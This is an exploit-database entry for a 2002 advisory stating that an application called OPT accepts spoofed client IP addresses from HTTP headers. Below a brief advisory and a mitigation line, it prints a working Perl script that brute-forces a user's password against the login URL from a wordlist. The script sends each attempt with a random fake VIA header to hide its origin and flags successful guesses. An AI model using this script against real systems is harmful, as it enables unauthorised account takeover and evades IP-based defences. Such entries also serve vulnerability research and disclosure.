OPT Accepts Fake IP Address in HTTP Headers

vendor:

N/A

by:

SecurityFocus

7.5

CVSS

HIGH

IP Spoofing

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

OPT Accepts Fake IP Address in HTTP Headers

It has been reported that OPT accepts the values supplied supplied by users in HTTP headers as the originating IP address of a request. It is possible for a remote host to supply a fake IP address in one of these environment variables that would obscure the origin on the request.

Mitigation:

Ensure that the application is not accepting user-supplied IP addresses as the originating IP address of a request.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6630/info

It has been reported that OPT accepts the values supplied supplied by users in HTTP headers as the originating IP address of a request. It is possible for a remote host to supply a fake IP address in one of these environment variables that would obscure the origin on the request.

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;
my ($url,$uid,$pf) = @ARGV;
open(P,"< $pf") || die "passf.?\n";
my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
while(<P>){ my $pwd = $_; chomp($pwd);
my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
my $hds = $res->headers; my $new = $hds->header("Location");
my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!!
my $cod = $res2->code;
my $pag = $res2->content;
print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; }
close (P);